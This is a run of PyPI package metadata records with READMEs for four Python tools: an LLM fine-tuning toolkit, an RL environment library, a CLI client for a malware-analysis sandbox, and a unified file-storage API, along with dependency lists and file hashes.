
## Highlights

### Automatic Dataset Conversion

Feed any dataset format and AITraining automatically detects and converts it.
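Column-sniffing detection of this kind can be sketched in a few lines of plain Python (illustrative only; this is not AITraining's actual detector, and the column names follow the common conventions for the formats listed in this section):

```python
def detect_format(columns):
    """Guess a dataset's conversational format from its column names."""
    cols = set(columns)
    if {"prompt", "chosen", "rejected"} <= cols:
        return "dpo"          # preference triples
    if "conversations" in cols:
        return "sharegpt"     # from/value conversation turns
    if "messages" in cols:
        return "messages"     # role/content chat turns
    if "instruction" in cols and "output" in cols:
        return "alpaca"       # instruction/input/output records
    if {"question", "answer"} <= cols:
        return "qa"           # question/answer variants
    if len(cols) == 1:
        return "plain_text"   # single text column for pretraining
    return "unknown"
```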
Supports 6 input formats with automatic detection:

| Format | Detection | Example Columns |
|--------|-----------|-----------------|
| **Alpaca** | instruction/input/output | `{"instruction": "...", "output": "..."}` |
| **ShareGPT** | from/value pairs | `{"conversations": [{"from": "human", ...}]}` |
| **Messages** | role/content | `{"messages": [{"role": "user", ...}]}` |
| **Q&A** | question/answer variants | `{"question": "...", "answer": "..."}` |
| **DPO** | prompt/chosen/rejected | For preference training |
| **Plain Text** | Single text column | Raw text for pretraining |

```bash
aitraining llm --train --auto-convert-dataset --chat-template gemma3 \
  --data-path tatsu-lab/alpaca --model google/gemma-3-270m-it
```

### 32 Chat Templates

Comprehensive template library with token-level weight control:

- **Llama family**: llama, llama-3, llama-3.1
- **Gemma family**: gemma, gemma-2, gemma-3, gemma-3n
- **Others**: mistral, qwen-2.5, phi-3, phi-4, chatml, alpaca, vicuna, zephyr

```python
from autotrain.rendering import get_renderer, ChatFormat, RenderConfig

config = RenderConfig(format=ChatFormat.CHATML, only_assistant=True)
renderer = get_renderer('chatml', tokenizer, config)
encoded = renderer.build_supervised_example(conversation)
# Returns: {'input_ids', 'labels', 'token_weights', 'attention_mask'}
```

### GRPO Training with Custom Environments

Train with Group Relative Policy Optimization using your own reward environment. The env provides prompts and scores multi-turn episodes — GRPO generates completions, scores them, and optimizes:

```bash
aitraining llm --train --trainer grpo \
  --model deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B \
  --rl-env-module my_envs.hotel_env \
  --rl-env-class HotelEnv \
  --rl-num-generations 4 \
  --rl-max-new-tokens 256
```

Your environment implements three methods:

```python
class HotelEnv:
    def build_dataset(self, tokenizer) -> Dataset:
        """Return HF Dataset with 'prompt' column."""

    def score_episode(self, model, tokenizer, completion, case_idx) -> float:
        """Run multi-turn episode from completion, return 0.0-1.0 score."""

    def get_tools(self) -> list[dict]:
        """Return tool schemas for generation (optional)."""
```

### Custom RL Environments (PPO)

Build custom reward functions for PPO training with three environment types:

```bash
# Text generation with custom reward
aitraining llm --train --trainer ppo \
  --rl-env-type text_generation \
  --rl-env-config '{"stop_sequences": ["</s>"]}' \
  --rl-reward-model-path ./reward_model

# Multi-objective rewards (correctness + formatting)
aitraining llm --train --trainer ppo \
  --rl-env-type multi_objective \
  --rl-env-config '{"reward_components": {"correctness": {"type": "keyword"}, "formatting": {"type": "length"}}}' \
  --rl-reward-weights '{"correctness": 1.0, "formatting": 0.1}'
```

### Hyperparameter Sweeps

Automated optimization with Optuna, random search, or grid search:

```python
from autotrain.utils import HyperparameterSweep, SweepConfig, ParameterRange

config = SweepConfig(
    backend="optuna",
    optimization_metric="eval_loss",
    optimization_mode="minimize",
    num_trials=20,
)
sweep = HyperparameterSweep(
    objective_function=train_model,
    config=config,
    parameters=[
        ParameterRange("learning_rate", "log_uniform", low=1e-5, high=1e-3),
        ParameterRange("batch_size", "categorical", choices=[4, 8, 16]),
    ]
)
result = sweep.run()  # Returns best_params, best_value, trial history
```

### Enhanced Evaluation Metrics

8 metrics beyond loss, with callbacks for periodic evaluation:

| Metric | Type | Use Case |
|--------|------|----------|
| **Perplexity** | Auto-computed | Language model quality |
| **BLEU** | Generation | Translation, summarization |
| **ROUGE** (1/2/L) | Generation | Summarization |
| **BERTScore** | Generation | Semantic similarity |
| **METEOR** | Generation | Translation |
| **F1/Accuracy** | Classification | Standard metrics |
| **Exact Match** | QA | Question answering |

```python
from autotrain.evaluation import Evaluator, EvaluationConfig, MetricType

config = EvaluationConfig(
    metrics=[MetricType.PERPLEXITY, MetricType.BLEU, MetricType.ROUGE, MetricType.BERTSCORE],
    save_predictions=True,
)
evaluator = Evaluator(model, tokenizer, config)
result = evaluator.evaluate(dataset)
```

### Auto LoRA Merge

After PEFT training, automatically merge adapters and save deployment-ready models:

```bash
# Default: merges adapters into full model
aitraining llm --train --peft --model meta-llama/Llama-3.2-1B

# Keep adapters separate (smaller files)
aitraining llm --train --peft --no-merge-adapter --model meta-llama/Llama-3.2-1B
```

---

## Screenshots

<p align="center">
  <img src="https://raw.githubusercontent.com/monostate/aitraining/main/docs/images/chat-screenshot.png" alt="Chat interface for testing trained models" width="700">
  <br>
  <em>Built-in chat interface for testing trained models with conversation history</em>
</p>

<p align="center">
  <img src="https://raw.githubusercontent.com/monostate/aitraining/main/docs/images/tui-wandb.png" alt="Terminal UI with W&B LEET integration" width="700">
  <br>
  <em>Terminal UI with real-time W&B LEET metrics visualization</em>
</p>

---

## Installation

```bash
pip install aitraining
```

Requirements: Python >= 3.10, PyTorch

## Quick Start

### Interactive Wizard

```bash
aitraining
```

The wizard guides you through:

1. Trainer type selection (LLM, vision, NLP, tabular)
2. Model selection with curated catalogs from HuggingFace
3. Dataset configuration with auto-format detection
4. Advanced parameters (PEFT, quantization, sweeps)

### Config File

```bash
aitraining --config config.yaml
```

### Python API

```python
from autotrain.trainers.clm import train
from autotrain.trainers.clm.params import LLMTrainingParams

config = LLMTrainingParams(
    model="meta-llama/Llama-3.2-1B",
    data_path="your-dataset",
    trainer="sft",
    epochs=3,
    batch_size=4,
    lr=2e-5,
    peft=True,
    auto_convert_dataset=True,
    chat_template="llama3",
)
train(config)
```

---

## Comparison

### AITraining vs AutoTrain vs Tinker

| Feature | AutoTrain | AITraining | Tinker |
|---------|-----------|------------|--------|
| **Trainers** | | | |
| SFT/DPO/ORPO | Yes | Yes | Yes |
| PPO (RLHF) | Basic | Enhanced (TRL) | Advanced |
| GRPO | No | Yes (TRL 0.28) | Custom |
| Reward Modeling | Yes | Yes | No |
| Knowledge Distillation | No | Yes (KL + CE loss) | Yes (text-only) |
| **Data** | | | |
| Auto Format Detection | No | Yes (6 formats) | No |
| Chat Template Library | Basic | 32 templates | 5 templates |
| Runtime Column Mapping | No | Yes | No |
| Conversation Extension | No | Yes | No |
| **Training** | | | |
| Hyperparameter Sweeps | No | Yes (Optuna) | Manual |
| Custom RL Environments | No | Yes (3 types) | Yes |
| Multi-objective Rewards | No | Yes | Yes |
| Forward-Backward Pipeline | No | Yes | Yes |
| Async Off-Policy RL | No | No | Yes |
| Stream Minibatch | No | No | Yes |
| **Evaluation** | | | |
| Metrics Beyond Loss | No | 8 metrics | Manual |
| Periodic Eval Callbacks | No | Yes | Yes |
| Custom Metric Registration | No | Yes | No |
| **Interface** | | | |
| Interactive CLI Wizard | No | Yes | No |
| TUI (Experimental) | No | Yes | No |
| W&B LEET Visualizer | No | Yes | Yes |
| **Hardware** | | | |
| Apple Silicon (MPS) | Limited | Full | No |
| Quantization (int4/int8) | Yes | Yes | Unknown |
| Multi-GPU | Yes | Yes | Yes |
| **Task Coverage** | | | |
| Vision Tasks | Yes | Yes | No |
| NLP Tasks | Yes | Yes | No |
| Tabular Tasks | Yes | Yes | No |
| Tool Use Environments | No | Yes (GRPO) | Yes |
| Multiplayer RL | No | No | Yes |

---

## Supported Tasks

| Task | Trainers | Status |
|------|----------|--------|
| LLM Fine-tuning | SFT, DPO, ORPO, PPO, GRPO, Reward, Distillation | Stable |
| Text Classification | Single/Multi-label | Stable |
| Token Classification | NER, POS tagging | Stable |
| Sequence-to-Sequence | Translation, Summarization | Stable |
| Image Classification | Single/Multi-label | Stable |
| Object Detection | YOLO, DETR | Stable |
| VLM Training | Vision-Language Models | Beta |
| Tabular | XGBoost, sklearn | Stable |
| Sentence Transformers | Semantic similarity | Stable |
| Extractive QA | SQuAD format | Stable |

---

## Configuration Example

```yaml
task: llm-sft
base_model: meta-llama/Llama-3.2-1B
project_name: my-finetune

data:
  path: your-dataset
  train_split: train
  auto_convert_dataset: true
  chat_template: llama3

params:
  epochs: 3
  batch_size: 4
  lr: 2e-5
  peft: true
  lora_r: 16
  lora_alpha: 32
  quantization: int4
  mixed_precision: bf16

# Optional: hyperparameter sweep
sweep:
  enabled: true
  backend: optuna
  n_trials: 10
  metric: eval_loss
```

---

## Documentation

**📚 [docs.monostate.com](https://docs.monostate.com)** — Complete documentation with tutorials, API reference, and examples.

### Quick Links

- [Getting Started](https://docs.monostate.com/foundations/quickstart)
- [LLM Fine-tuning Guide](https://docs.monostate.com/cli/llm-training)
- [YAML Configuration](https://docs.monostate.com/cli/yaml-configs)
- [Python SDK Reference](https://docs.monostate.com/api/python-sdk)
- [Advanced Training (DPO/ORPO/PPO)](https://docs.monostate.com/advanced/dpo-training)
- [Changelog](https://docs.monostate.com/changelog)

### Local Docs

- [Interactive Wizard Guide](docs/interactive_wizard.md)
- [Dataset Formats & Conversion](docs/dataset_formats.md)
- [Trainer Reference](docs/trainers/README.md)
- [Python API](docs/api/PYTHON_API.md)
- [RL API Reference](docs/reference/RL_API_REFERENCE.md)

---

## License

Apache 2.0 - See [LICENSE](LICENSE) for details.

Based on [AutoTrain Advanced](https://github.com/huggingface/autotrain-advanced) by Hugging Face.

---

<p align="center">
  <a href="https://monostate.ai">Monostate AI</a>
</p>
text/markdown
null
Andrew Correa <andrew@monostate.ai>
null
null
Apache 2.0
automl, autonlp, autotrain, huggingface, machine learning, deep learning, fine-tuning, llm
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Intended Audience :: Education", "Intended Audience :: Science/Research", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", "Programming Language :: Python :: 3.8", "Programming Language :: ...
[]
null
null
>=3.8
[]
[]
[]
[ "torch>=1.10.0", "transformers==4.57.3", "accelerate==1.11.0", "peft==0.14.0", "trl>=0.28.0", "datasets[vision]~=3.2.0", "tensorboard==2.18.0", "scikit-learn==1.6.0", "evaluate==0.4.3", "sentence-transformers==3.3.1", "albumentations==1.4.23", "Pillow==11.0.0", "pandas==2.2.3", "numpy", ...
[]
[]
[]
[]
twine/6.2.0 CPython/3.13.5
2026-02-19T22:14:03.506233
aitraining-0.0.44.tar.gz
544,540
07/89/c08a311284d220d607662a20f66fe290ba51b156d4b7879cbb7ad2691d40/aitraining-0.0.44.tar.gz
source
sdist
null
false
f00eb6627901b4fc73ed9b540904bfea
63fd7e48f4fbc1c54db35416132f2997adc252fc4bb5a8b6d2c77e5dd5982a48
0789c08a311284d220d607662a20f66fe290ba51b156d4b7879cbb7ad2691d40
null
[ "LICENSE" ]
239
2.4
benchmax
0.1.2.dev14
Framework-Agnostic RL Environments for LLM Fine-Tuning
<picture> <img alt="Benchmax" src="./static/benchmax.png" width="full"> </picture>

## benchmax: Framework-Agnostic RL Environments for LLM Fine-Tuning

*A lightweight, training-framework-agnostic library for defining, running, and parallelizing environments to fine-tune OSS LLMs with reinforcement learning.*

<div id="badges" align="center">
  <a href="https://cgft.io">
    <img src="https://img.shields.io/badge/cgft.io-blue?style=for-the-badge" alt="Website"/>
  </a>
  <a href="https://x.com/cgftlabs">
    <img src="https://img.shields.io/badge/Follow @cgftlabs-black?style=for-the-badge&logo=X&logoColor=white" alt="@cgftlabs"/>
  </a>
</div>
<div align="center" style="line-height: 1;">
  <a href="https://github.com/girishbarca/benchmax/blob/main/LICENSE"><img alt="License" src="https://img.shields.io/badge/License-Apache_2.0-blue.svg"/></a>
</div>

## 📌 News

- **[29 Oct 2025]** 🎉 Added support for easy multi-node parallelization across all major cloud providers using [SkyPilot](https://github.com/skypilot-org/skypilot)
- **[29 Oct 2025]** 🎉 Integration with [SkyRL](https://github.com/NovaSky-AI/SkyRL) for distributed RL training across clusters
- **[Upcoming]** 🛠️ Integration with Tinker API.

## 📘 Quickstart

**Example: Multi-node parallelization of the Excel env with SkyRL and SkyPilot**

RL environments can be computationally expensive to run (e.g. running tests). To handle these workloads efficiently, we distribute rollouts across multiple nodes using **SkyPilot**, horizontally scaling `benchmax` across cloud providers like GCP, AWS, Azure, etc. **SkyRL** is a training framework `benchmax` is currently integrated with.

Use our **SkyRL** integration to RL-finetune Qwen-2.5 to do spreadsheet manipulation using an Excel MCP parallelized across multiple nodes. The environment is defined in [`benchmax.envs.excel.excel_env.ExcelEnvSkypilot`](/src/benchmax/envs/excel/excel_env.py).

1. **Prepare the dataset**

   ```bash
   uv run src/benchmax/adapters/skyrl/benchmax_data_process.py \
     --local_dir ~/data/excel \
     --dataset_name spreadsheetbench \
     --env_path benchmax.envs.excel.excel_env.ExcelEnvLocal
   ```

   Note: We are using `ExcelEnvLocal` instead of `ExcelEnvSkypilot` because the MCP is only used for listing tools to prepare the system prompt.

2. **Run training and parallelize the Excel environment**

   ```bash
   bash examples/skyrl/run_benchmax_excel.sh
   ```

   This Excel env example will spin up 5 nodes with 20 servers per node (100 MCP servers in parallel in total).

For more details, check out [multi-node parallelization](/src/benchmax/envs/mcp/README.md) and [SkyRL integration](/examples/skyrl/README.md).

## ℹ️ Overview

`benchmax` comes with:

- A collection of ready-to-use reinforcement learning (RL) environments for LLM fine-tuning, ranging from multi-hop search to spreadsheet manipulation to CRM agents
- An easy way to define, compose, and parallelize your own environments, including leveraging the existing ecosystem of MCP servers
- Built-in integrations with popular RL training libraries (SkyRL, etc.). `benchmax` is trainer-agnostic by design

Define your environment as:

1. A **toolset** (LLM calls, external APIs, calculators, MCPs, etc.).
2. **Output parsing** logic to extract structured observations.
3. **Reward functions** to score model outputs.

Rollout management, parallel execution, etc. come out of the box.

⭐ Star our repository to show your support!

## 💡 Core Features

**Built-in examples & templates**
Get started with ready-to-use recipes, from Wikipedia search to spreadsheet manipulation. Easy to copy, customize, and extend. And yes, more are on the way.

**Trainer integrations**
Use your own trainer or training framework - no lock-in. `benchmax` is already integrated into SkyRL, with more integrations (Tinker, etc.) coming soon!

**MCP support**
Tap into the growing MCP ecosystem and integrate existing servers as tools within your environments.

**Multi-node parallel execution**
Multi-node parallelization enabled out of the box, with state isolation across rollouts (e.g. editing files on the filesystem).

## 🌐 Creating & Training with Environments

### What is an environment?

An environment consists of:

- A list of tools that an LLM can call
- A list of reward functions that evaluate the quality & correctness of the model's final output.

We also support MCP servers natively, allowing you to easily leverage the many servers built by the community.

### Pre-built environments

Ready-to-use environments with pre-configured tools and reward functions.

- [CRM](/src/benchmax/envs/crm/README.md)
- [Excel](/src/benchmax/envs/excel/README.md)
- [Math](/src/benchmax/envs/math/README.md)
- [Wikipedia](/src/benchmax/envs/wikipedia/README.md)

### How do I create a custom environment?

1. [With existing MCP servers](/src/benchmax/envs/mcp/README.md) (built-in support for multi-node parallelization)
2. [Extend BaseEnv](/src/benchmax/envs/README.md)

### How about more complex environments?

- Check out our Excel spreadsheet RL environment: `benchmax.envs.excel.excel_env.ExcelEnv`

### How do I use an environment with my preferred RL Trainer?

We currently have integrations with SkyRL. More incoming!

[`benchmax` environments with skyrl](/examples/skyrl/README.md)

### I want a specific environment

Open an issue and tag us & we will look into building you one!

---

## 🎯 Motivation

- **Modularity and Simplicity**: We set out to build a lightweight, modular system for defining RL environments, breaking them down into simple, composable parts: tools, tool output parsing, and reward functions. The goal is to make it easy for software engineers to build and experiment with RL environments without needing deep RL expertise.
- **Trainer Integrations**: Lots of new RL training frameworks keep popping up (e.g., numerous forks of verl) & we expect this to continue. They are often tightly coupled with specific environments, leading to fragmentation and limited compatibility. We are building `benchmax` as a standalone library with integrations to these different training frameworks & as an easy way for new frameworks to tap into an existing pool of environments. We're already integrated with SkyRL (Tinker coming soon)!
- **Task Recipes and Ideas**: We want `benchmax` to be a living library of reusable, RL-compatible task recipes, ready to inspire and extend beyond the usual suspects like math and coding. We aim to support more real-world workflows, including open-ended and long-horizon tasks.
- **Parallelization and Cloud Compatibility**:
  - Enable efficient parallelization with maintained statefulness between rollouts.
  - Facilitate easy deployment and scalability in cloud environments.
- **MCP as a first-class citizen**: There has been an explosion of MCP servers/tools built for use-cases ranging from browser use to Excel to game creation. `benchmax` allows folks to leverage and compose these existing MCP servers to build environments integrated with real-world systems, e.g. Excel.

## 🤝 Contributing

We welcome new environment recipes, bug reports, and trainer integrations!

⭐ Star our repository to show your support!

## 📜 License

Apache 2.0 © 2025 CGFT Inc.
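The toolset / output-parsing / reward decomposition described above can be illustrated with a framework-free sketch (a hypothetical toy environment, not benchmax's actual `BaseEnv` API):

```python
import re

class TinyMathEnv:
    """Toy environment: one tool schema, a parsing step, and a reward."""

    def get_tools(self):
        # Toolset: schemas the LLM may call during a rollout.
        return [{"name": "add", "description": "Add two integers"}]

    def parse_output(self, completion: str):
        # Output parsing: extract a structured answer from raw model text.
        match = re.search(r"ANSWER:\s*(-?\d+)", completion)
        return int(match.group(1)) if match else None

    def reward(self, completion: str, target: int) -> float:
        # Reward function: 1.0 for an exact match, 0.0 otherwise.
        return 1.0 if self.parse_output(completion) == target else 0.0

env = TinyMathEnv()
print(env.reward("The sum is ANSWER: 42", 42))  # 1.0
print(env.reward("no idea", 42))                # 0.0
```

A real benchmax environment would additionally get rollout management and parallel execution from the library, which this sketch omits.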
text/markdown
cgft.io
null
null
null
null
null
[ "Programming Language :: Python :: 3", "Operating System :: OS Independent" ]
[]
null
null
>=3.12
[]
[]
[]
[ "aiohttp>=3.13.1", "asyncio>=4.0.0", "cloudpickle>=3.0.0", "datasets>=4.0.0", "fastmcp~=2.12.0; extra == \"mcp\"", "pyjwt>=2.10.1; extra == \"mcp\"", "skypilot[aws,gcp]~=0.8.1; extra == \"skypilot\"", "pip>=25.3; extra == \"skypilot\"", "msrestazure>=0.6.4.post1; extra == \"skypilot\"" ]
[]
[]
[]
[]
uv/0.8.13
2026-02-19T22:13:50.601225
benchmax-0.1.2.dev14.tar.gz
70,605
85/ed/d737283b455398b1141553a9e5ab666367949df1be5686a1fcddc8845ba3/benchmax-0.1.2.dev14.tar.gz
source
sdist
null
false
14357f8eb998618d9ba067d1d4ee17e9
3298f772478e4fe2e40758b1c66b15deda8aec7215135dcc87d7b57edbf231af
85edd737283b455398b1141553a9e5ab666367949df1be5686a1fcddc8845ba3
null
[ "LICENSE" ]
216
2.4
sandbox-cli
0.2.47
Command line tool for interaction with sandboxes
![Image](https://raw.githubusercontent.com/Security-Experts-Community/sandbox-cli/refs/heads/main/docs/assets/logo_with_text.svg)

<p align="center">
  <em>Work with PT Sandbox like a pro</em>
</p>

---

**Documentation**: <a href="https://security-experts-community.github.io/sandbox-cli">https://security-experts-community.github.io/sandbox-cli</a>

**Source Code**: <a href="https://github.com/Security-Experts-Community/sandbox-cli">https://github.com/Security-Experts-Community/sandbox-cli</a>

---

> [!NOTE]
> `python >= 3.11` is required.

## Installation

Using `pipx`:

```sh
pipx install sandbox-cli
```

Using `pip`:

```sh
pip install sandbox-cli
```

NixOS:

```sh
nix shell 'github:Security-Experts-Community/sandbox-cli'
```

### Config

You must create a default config file as described in `docs/config-examples/config.toml`:

Linux/macOS:

```sh
~/.config/sandbox-cli/config.toml or $XDG_CONFIG_HOME/sandbox-cli/config.toml
```

Windows:

```ps1
%APPDATA%\sandbox-cli\config.toml
```

## Available options

- `scanner` - Scan with the sandbox.
- `images` - Get available images in the sandbox.
- `download` - Download any artifact from the sandbox.
- `email` - Upload an email and get its headers.
- `report` - Generate a short report from sandbox scans.
- `unpack`/`conv` - Convert sandbox logs into an analysis-friendly format.
- `rules` - Work with raw sandbox rules.

<p align="middle">
  <img width="50%" src="https://raw.githubusercontent.com/Security-Experts-Community/sandbox-cli/refs/heads/main/docs/assets/pic_right.svg">
</p>

## Usage examples

### images

Get all available images:

```bash
sandbox-cli images
```

```bash
┏━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━┓
┃ Name                  ┃ ID                      ┃ Version    ┃ Product version ┃
┡━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━┩
│ altlinux              │ altworkstation-10-x64   │ ...        │ ...             │
│ astra                 │ astralinux-smolensk-x64 │ ...        │ ...             │
│ redos                 │ redos-murom-x64         │ ...        │ ...             │
│ ubuntu                │ ubuntu-jammy-x64        │ ...        │ ...             │
│ Windows 10 Pro        │ win10-1803-x64          │ ...        │ ...             │
│ Windows 10 Enterprise │ win10-22H2-x64          │ ...        │ ...             │
│ Windows 10 Pro        │ win11-23H2-x64          │ ...        │ ...             │
│ Windows 7 Enterprise  │ win7-sp1-x64            │ ...        │ ...             │
│ Windows 7 Enterprise  │ win7-sp1-x64-ics        │ ...        │ ...             │
└───────────────────────┴─────────────────────────┴────────────┴─────────────────┘
```

### scanner

Scan the file on all available Windows images with a 60-second timeout and automatic log unpacking:

```bash
sandbox-cli scanner scan-new -i windows -t 60 -U malware.exe
```

<p align="middle">
  <img width="50%" src="https://raw.githubusercontent.com/Security-Experts-Community/sandbox-cli/refs/heads/main/docs/assets/pic_left.svg">
</p>

## Development

`uv` is used to build the project.

```bash
uv sync
```
text/markdown
Alexey Kolesnikov
null
null
null
null
null
[]
[]
null
null
>=3.11
[]
[]
[]
[ "aiofiles>=24.1.0", "asyncssh>=2.21.1", "colorama>=0.4.6", "cryptography>=46.0.2", "cyclopts>=4.2.5", "docker>=7.1.0", "ptsandbox>=5.0.8", "pyzipper>=0.3.6", "rich>=14.1.0", "zstandard>=0.23.0" ]
[]
[]
[]
[ "Homepage, https://github.com/Security-Experts-Community/sandbox-cli", "Documentation, https://security-experts-community.github.io/sandbox-cli", "Repository, https://github.com/Security-Experts-Community/sandbox-cli", "Issues, https://github.com/Security-Experts-Community/sandbox-cli/issues" ]
twine/6.2.0 CPython/3.13.12
2026-02-19T22:13:43.069200
sandbox_cli-0.2.47.tar.gz
35,034
c9/2a/1f15e8238af80c82e3dd4993d470245e6ed7c75710870bceb1e977e9a268/sandbox_cli-0.2.47.tar.gz
source
sdist
null
false
ea65125223e4997693b36bb7d8b13438
6929b3210208f229f2408c146e8b28c800e107ea45bcad2f571d871d80b49eae
c92a1f15e8238af80c82e3dd4993d470245e6ed7c75710870bceb1e977e9a268
MIT
[ "LICENSE", "NOTICE" ]
226
2.4
remote-store
0.4.3
One simple API for file storage. Local, S3, SFTP, Azure. Same methods, swappable backends, zero reinvention.
<p align="center"> <img src="https://raw.githubusercontent.com/haalfi/remote-store/master/assets/logo.png" width="320" alt="remote-store logo"> </p> <h1 align="center">remote-store</h1> <p align="center"> One simple API for file storage. Local, S3, SFTP, Azure. Same methods, swappable backends, zero reinvention. </p> <p align="center"> <a href="https://pypi.org/project/remote-store/"><img src="https://img.shields.io/pypi/v/remote-store" alt="PyPI version"></a> <a href="https://pypi.org/project/remote-store/"><img src="https://img.shields.io/pypi/pyversions/remote-store" alt="Python versions"></a> <a href="https://remote-store.readthedocs.io/"><img src="https://readthedocs.org/projects/remote-store/badge/?version=latest" alt="Documentation Status"></a> <a href="https://github.com/haalfi/remote-store/blob/master/LICENSE"><img src="https://img.shields.io/pypi/l/remote-store" alt="License"></a> </p> `remote-store` gives you one simple API to read, write, list, and delete files. The same methods work whether your files live on disk, in S3, on an SFTP server, or anywhere else. You just swap the backend config. That's the whole trick. Reads and writes stream by default, so large files just work. Under the hood, each backend delegates to the library you'd pick anyway (`boto3`, `paramiko`, `azure-storage-blob`, …). This package doesn't reinvent file I/O. It just gives every backend the same simple front door. ## What you get - **One `Store`, many backends:** local fs, S3, SFTP, Azure Blob, more to come - **Just the basics:** read, write, list, delete, exists. No magic, no surprises - **Battle-tested I/O under the hood:** backends wrap `boto3`, `paramiko`, etc. 
- **Swappable via config:** switch backends without touching application code - **Streaming by default:** reads and writes handle large files without blowing up memory - **Atomic writes** where the backend supports it - **Zero runtime dependencies:** the core package installs nothing; backend extras pull in only what they need - **Typed & tested:** strict mypy, spec-driven test suite ## Installation Install from [PyPI](https://pypi.org/project/remote-store/): ```bash pip install remote-store ``` Backends that need extra dependencies use extras: ```bash pip install remote-store[s3] # Amazon S3 / MinIO pip install remote-store[s3-pyarrow] # S3 with PyArrow (high-throughput) pip install remote-store[sftp] # SFTP / SSH ``` ## Quick Start ```python import tempfile from remote_store import BackendConfig, RegistryConfig, Registry, StoreProfile with tempfile.TemporaryDirectory() as tmp: config = RegistryConfig( backends={"local": BackendConfig(type="local", options={"root": tmp})}, stores={"data": StoreProfile(backend="local", root_path="data")}, ) with Registry(config) as registry: store = registry.get_store("data") store.write("hello.txt", b"Hello, world!") content = store.read_bytes("hello.txt") print(content) # b'Hello, world!' ``` Switch to S3 by changing the config. The rest of the code stays the same: ```python config = RegistryConfig( backends={"s3": BackendConfig(type="s3", options={"bucket": "my-bucket"})}, stores={"data": StoreProfile(backend="s3", root_path="data")}, ) ``` ## Configuration Configuration is declarative and immutable. Build it from Python objects or parse it from a dict (e.g. 
loaded from TOML/JSON): ```python from remote_store import RegistryConfig config = RegistryConfig.from_dict({ "backends": { "local": {"type": "local", "options": {"root": "/data"}}, }, "stores": { "uploads": {"backend": "local", "root_path": "uploads"}, "reports": {"backend": "local", "root_path": "reports"}, }, }) ``` ## Store API **Read & write** |Method |Description | |-----------------------------|----------------------------| |`read(path)` |Streaming read (`BinaryIO`) | |`read_bytes(path)` |Full content as `bytes` | |`write(path, content)` |Write bytes or binary stream| |`write_atomic(path, content)`|Write via temp file + rename| **Browse & inspect** |Method |Description | |-----------------------------------|--------------------------------| |`list_files(path)` |Iterate `FileInfo` objects | |`list_folders(path)` |Iterate subfolder names | |`exists(path)` |Check if a file or folder exists| |`is_file(path)` / `is_folder(path)`|Type checks | |`get_file_info(path)` |File metadata (`FileInfo`) | |`get_folder_info(path)` |Folder metadata (`FolderInfo`) | **Manage** |Method |Description | |---------------------|----------------------------------------------| |`delete(path)` |Delete a file | |`delete_folder(path)`|Delete a folder | |`move(src, dst)` |Move or rename | |`copy(src, dst)` |Copy a file | **Utility** |Method |Description | |---------------------|----------------------------------------------| |`supports(capability)`|Check if the backend supports a capability | |`to_key(path)` |Convert native/absolute path to store-relative key| |`close()` |Close the underlying backend | All write/move/copy methods accept `overwrite=True` to replace existing files. For full details, see the [API reference](https://remote-store.readthedocs.io/en/latest/api/store/). 
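The "temp file + rename" trick behind `write_atomic` can be illustrated with a stdlib-only sketch. The function name mirrors the Store method, but this is an illustration of the mechanism under a local-filesystem assumption, not the library's actual implementation:

```python
import os
import tempfile

def write_atomic(path: str, content: bytes) -> None:
    """Write `content` to `path` so readers never observe a partial file."""
    # Stage the bytes in a temp file in the *same directory*, so the
    # final rename stays on one filesystem and is therefore atomic.
    directory = os.path.dirname(os.path.abspath(path))
    fd, tmp_path = tempfile.mkstemp(dir=directory)
    try:
        with os.fdopen(fd, "wb") as tmp:
            tmp.write(content)
            tmp.flush()
            os.fsync(tmp.fileno())
        os.replace(tmp_path, path)  # atomic on POSIX and Windows
    except BaseException:
        os.unlink(tmp_path)
        raise
```

If the process dies mid-write, the target file keeps its old contents; only the orphaned temp file is lost.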
## Supported Backends |Backend |Status |Extra | |---------------------|----------|----------------------------| |Local filesystem |Built-in | | |Amazon S3 / MinIO |Built-in |`remote-store[s3]` | |S3 (PyArrow) |Built-in |`remote-store[s3-pyarrow]` | |SFTP / SSH |Built-in |`remote-store[sftp]` | |Azure Blob / ADLS |Planned | | ## Examples Runnable scripts in [`examples/`](https://github.com/haalfi/remote-store/tree/master/examples): |Script |What it shows | |--------------------------------------------------------------------------------------------------|-----------------------------------------------| |[quickstart.py](https://github.com/haalfi/remote-store/blob/master/examples/quickstart.py) |Minimal config, write, read | |[file_operations.py](https://github.com/haalfi/remote-store/blob/master/examples/file_operations.py)|Full Store API: read, write, delete, move, copy, list, metadata, type checks, capabilities, to_key| |[streaming_io.py](https://github.com/haalfi/remote-store/blob/master/examples/streaming_io.py) |Streaming writes and reads with `BytesIO` | |[atomic_writes.py](https://github.com/haalfi/remote-store/blob/master/examples/atomic_writes.py) |Atomic writes and overwrite semantics | |[configuration.py](https://github.com/haalfi/remote-store/blob/master/examples/configuration.py) |Config-as-code, `from_dict()`, multiple stores, S3/SFTP backend configs| |[error_handling.py](https://github.com/haalfi/remote-store/blob/master/examples/error_handling.py)|Catching `NotFound`, `AlreadyExists`, etc. | Interactive Jupyter notebooks are available in [`examples/notebooks/`](https://github.com/haalfi/remote-store/tree/master/examples/notebooks). ## Contributing See [CONTRIBUTING.md](https://github.com/haalfi/remote-store/blob/master/CONTRIBUTING.md) for the spec-driven development workflow, code style, and how to add new backends. 
## Security To report a vulnerability, please use [GitHub Security Advisories](https://github.com/haalfi/remote-store/security/advisories/new) instead of opening a public issue. See [SECURITY.md](https://github.com/haalfi/remote-store/blob/master/SECURITY.md) for details. ## License MIT
text/markdown
Harald Alferi
null
null
null
